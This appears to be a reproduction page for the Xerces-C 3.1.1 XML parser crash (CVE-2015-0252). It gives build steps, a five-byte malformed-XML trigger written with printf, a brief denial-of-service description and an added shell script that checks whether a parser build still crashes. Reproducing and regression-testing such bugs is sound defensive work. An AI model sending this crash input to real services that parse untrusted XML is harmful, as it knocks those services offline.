INSTALL & Configuration
wget https://github.com/mudongliang/source-packages/raw/master/CVE-2015-0252/xerces-c-3.1.1.tar.gz
tar -xvf xerces-c-3.1.1.tar.gz
cd xerces-c-3.1.1
./configure
make
Problems in Installation & Configuration
How to trigger vulnerability
printf "\xff\xfe\x00\x00\x3c" > file.xml
./samples/DOMPrint ./file.xml
Vulnerability Details & Patch
The Xerces-C XML parser mishandles certain kinds of malformed input documents, resulting in a segmentation fault during a parse operation. The bug does not appear to allow for remote code execution, but it is a denial-of-service issue: in many applications, an unauthenticated attacker may be able to supply malformed input and cause a crash.
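
A regression check for the crash described above, as an added example that is not part of the original page or the Xerces-C project: it feeds the same five bytes to a parser binary and reports whether the process died on a signal or exited normally. The function names and the DOMPRINT environment variable are assumptions made for this example.

```shell
#!/bin/sh
# Added example: check whether a parser build still dies on the trigger input.

# Write the 5-byte trigger from this page (FF FE 00 00 3C). Octal escapes
# are used so this also works where printf does not understand \x.
make_trigger() {
    printf '\377\376\000\000\074' > "$1"
}

# Turn a shell exit status into a verdict.
# sh and bash report "killed by signal N" as 128+N (SIGSEGV is 139 on Linux).
classify_status() {
    status=$1
    if [ "$status" -gt 128 ]; then
        echo "CRASH signal=$((status - 128))"
    elif [ "$status" -eq 126 ] || [ "$status" -eq 127 ]; then
        # 126/127 mean the binary was not executable or not found.
        echo "NOT-RUN exit=$status"
    elif [ "$status" -eq 0 ]; then
        echo "OK exit=0"
    else
        # Non-zero exit without a signal: the input was refused cleanly.
        echo "REJECTED exit=$status"
    fi
}

# Run the given command with the trigger file appended as its last argument.
check_parser() {
    input=$(mktemp) || return 2
    make_trigger "$input"
    rc=0
    "$@" "$input" >/dev/null 2>&1 || rc=$?
    rm -f "$input"
    classify_status "$rc"
}

# Usage (DOMPRINT is this example's own variable):
#   DOMPRINT=./samples/DOMPrint sh check.sh
if [ -n "${DOMPRINT:-}" ]; then
    check_parser "$DOMPRINT"
fi
```

A CRASH verdict means the build under test is still affected; any other verdict means the process survived the input.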